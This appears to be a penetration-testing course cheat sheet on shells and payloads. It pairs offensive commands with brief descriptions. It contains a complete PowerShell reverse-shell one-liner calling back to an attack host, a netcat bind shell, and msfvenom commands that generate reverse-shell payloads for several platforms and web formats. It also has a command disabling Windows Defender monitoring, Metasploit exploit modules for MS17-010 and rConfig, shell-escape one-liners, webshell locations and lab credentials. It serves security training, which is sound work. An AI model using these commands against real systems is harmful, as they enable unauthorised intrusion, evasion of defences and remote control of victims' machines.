SHELLS & PAYLOADS
CHEAT SHEET
Commands Description
xfreerdp /v:10.129.x.x /u:htb-student /p:HTB_@cademy_stdnt! CLI-based
tool used to
connect to a
Windows
target using
the Remote
Desktop
Protocol
env Works with
many
different
command
language
interpreters to
discover the
environmental
variables of a
system. This
is a great way
to find out
which shell
language is in
use
sudo nc -lvnp <port #> Starts a
netcat
listener on a
specified port
nc -nv <ip address of computer with listener started><port being listened on> Connects to a
netcat listener
at the
specified IP
address and
port
Commands Description
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f Uses netcat
to bind a shell
(/bin/bash)
the specified
IP address
and port. This
allows for a
shell session
to be served
remotely to
anyone
connecting to
the computer
this command
has been
issued on
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream(); Powershell
[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName one-liner
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS used to
' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" connect back
to a listener
that has been
started on an
attack box
Set-MpPreference -DisableRealtimeMonitoring $true Powershell
command
using to
disable real
time
monitoring in
Windows
Defender
use exploit/windows/smb/psexec Metasploit
exploit
module that
can be used
on vulnerable
Windows
system to
establish a
shell session
utilizing smb &
psexec
shell Command
used in a
meterpreter
shell session
to drop into a
system shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf MSFvenom
command
used to
generate a
linux-based
reverse shell
stageless
payload
Commands Description
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe MSFvenom
command
used to
generate a
Windows-
based
reverse shell
stageless
payload
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho MSFvenom
command
used to
generate a
MacOS-
based
reverse shell
payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp MSFvenom
command
used to
generate a
ASP web
reverse shell
payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp MSFvenom
command
used to
generate a
JSP web
reverse shell
payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war MSFvenom
command
used to
generate a
WAR java/jsp
compatible
web reverse
shell payload
use auxiliary/scanner/smb/smb_ms17_010 Metasploit
exploit
module used
to check if a
host is
vulnerable to
ms17_010
Commands Description
use exploit/windows/smb/ms17_010_psexec Metasploit
exploit
module used
to gain a
reverse shell
session on a
Windows-
based system
that is
vulnerable to
ms17_010
use exploit/linux/http/rconfig_vendors_auth_file_upload_rce Metasploit
exploit
module that
can be used
to optain a
reverse shell
on a
vulnerable
linux system
hosting
rConfig
3.9.6
python -c 'import pty; pty.spawn("/bin/sh")' Python
command
used to
spawn an
interactive
shell on a
linux-based
system
/bin/sh -i Spawns an
interactive
shell on a
linux-based
system
perl —e 'exec "/bin/sh";' Uses perl to
spawn an
interactive
shell on a
linux-based
system
ruby: exec "/bin/sh" Uses ruby to
spawn an
interactive
shell on a
linux-based
system
Lua: os.execute('/bin/sh') Uses Lua to
spawn an
interactive
shell on a
linux-based
system
Commands Description
awk 'BEGIN {system("/bin/sh")}' Uses awk
command to
spawn an
interactive
shell on a
linux-based
system
find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \; Uses find
command to
spawn an
interactive
shell on a
linux-based
system
find . -exec /bin/sh \; -quit An alternative
way to use
the find
command to
spawn an
interactive
shell on a
linux-based
system
vim -c ':!/bin/sh' Uses the text-
editor VIM to
spawn an
interactive
shell. Can be
used to
escape "jail-
shells"
ls -la <path/to/fileorbinary> Used to list
files &
directories on
a linux-based
system and
shows the
permission for
each file in
the chosen
directory. Can
be used to
look for
binaries that
we have
permission to
execute
sudo -l Displays the
commands
that the
currently
logged on
user can run
as sudo
Commands Description
/usr/share/webshells/laudanum Location of
laudanum
webshellson
ParrotOS and
Pwnbox
/usr/share/nishang/Antak-WebShell Location of
Antak-
Webshell on
Parrot OS
and Pwnbox